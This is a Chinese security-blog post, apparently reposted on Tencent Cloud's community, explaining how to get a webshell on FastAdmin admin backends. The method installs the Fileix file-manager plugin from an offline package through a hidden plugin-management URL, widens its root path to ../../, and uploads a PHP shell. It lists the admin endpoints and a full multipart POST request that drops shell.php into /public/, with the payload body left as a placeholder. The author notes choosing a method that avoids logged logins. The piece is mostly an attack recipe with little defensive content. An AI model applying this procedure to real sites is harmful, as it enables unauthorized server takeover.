专栏首页黑白安全FastAdmin后台GetShell
原创

FastAdmin后台GetShell

0x01 前言

FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,可以利用三方插件GetShell

0x02 本地测试

FastAdmin官方源码下载地址:

ActionScript

https://www.fastadmin.net/download.html

开启phpstudy本地搭建

安装成功,新版源码的后台地址是随机生成的

后台默认会有插件管理功能,但是绝大部分用户会把这个功能阉割掉

点进去看到有一堆付费和免费的插件

翻到了目前已有的三个官方发布的在线文件管理器插件,一个是官方付费版,一个是三方付费版

但是由于舍不得花十块钱买插件,所有只能用三方免费版插件,直接点击安装会需要登录账号,登录信息会记录到日志,不便于操作,所以去官方下载离线安装包

Fileix文件管理器离线安装包官方下载地址:

ActionScript

https://www.fastadmin.net/store/fileix.html

点击离线安装,选择上传你下载的ZIP离线安装包

插件安装完成会自动启用,默认路径配置是这样的

然后打开是这样的

可以修改为 ../../,那么再打开就是这样的

然后浅显易懂,直接右键上传php文件就能getshell

上面是本地测试环境,真实环境会出现这样一个问题,就是点击文件管理功能不会显示任何内容

后来了解一下是因为没有配置前台页面,不太好修改,所以利用下面的方法

0x03 通用方法

1.插件管理地址:

ActionScript

/admin/addon?ref=addtabs

进入后台默认不显示插件管理功能,访问插件管理地址,上传离线安装包

2.文件管理地址/读取所有文件地址:

ActionScript

/admin/fileix?ref=addtabs
/admin/fileix/lst

真实环境中如果出现不显示功能的情况,必要时可以读取所有文件地址

3.上传poc:

ActionScript

POST /admin/fileix/data?target=%2F HTTP/1.1
Host: localhost
Content-Length: 1050
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrZmyeAB3SciJDWST
Accept: */*
Referer: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=xxxxxxxx
Connection: close
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/octet-stream
code
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="action"
upload
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="target"
/public/
------WebKitFormBoundaryrZmyeAB3SciJDWST--

修改host地址post过去

利用poc成功上传shell

文由微信公众号:nearsec

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 如何防范黑客人肉搜索

    不要在网络上泄露自己的隐私 这里的隐私指的是自己的真实身份,例如我们在注册一些网站、论坛的ID时,会让你填写一些个人的真实情况,这时我们最好不要填写(通常在注册...

    周俊辉
  • 如何防范黑客人肉搜索

    不要在网络上泄露自己的隐私 这里的隐私指的是自己的真实身份,例如我们在注册一些网站、论坛的ID时,会让你填写一些个人的真实情况,这时我们最好不要填写(通常在注册...

    周俊辉
  • Confluence 路径穿越漏洞分析(CVE-2019-3398)

    感觉最近Confluence一下子就火起来了,各种爆洞= =。这个洞是17号爆的,影响没有之前那个RCE的大,需要登录,还需要有修改文章上传附件的权限,个人感觉...

    周俊辉
  • FastAdmin后台GetShell

    FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,可以利用三方插件GetShell

    7089bAt@PowerLi
  • 如何安装Pycharm官方统计代码行插件

    Jetpropelledsnake21
  • 讲真,这两款idea插件,能治愈你英语不好的病

    时不时就有小伙伴问我,“二哥,能推荐一款 IDE 吗?”你看这话问的,现在搞 Java 的不都在用 Intellij IDEA 吗,还用得着推荐(我已经和 Ec...

    沉默王二
  • IDEA主题美化

    IntelliJ IDEA主要用于支持 Java、Scala、Groovy 等语言的开发工具,同时具备支持目前主流的技术和框架,擅长于企业应用、移动应用和 We...

    说故事的五公子
  • 你必须知道的Chrome插件,大牛都在用!

    说到浏览器我相信大多数人都会首推 Chrome 浏览器,尤其是程序员最喜欢用 Chrome

    材ccc
  • android gridview几个重要属性(android:listSelector自带内部padding分析)

    一、android:scrollbarStyle  决定状态条的位置 常用属性outsideOverlay,滚动条在最外层,gridview设置的paddin...

    用户1155943
  • IDEA界面太丑??尝试一下这几个插件!

    IntelliJ IDEA主要用于支持 Java、Scala、Groovy 等语言的开发工具,同时具备支持目前主流的技术和框架,擅长于企业应用、移动应用和 We...

    乱敲代码

扫码关注云+社区

领取腾讯云代金券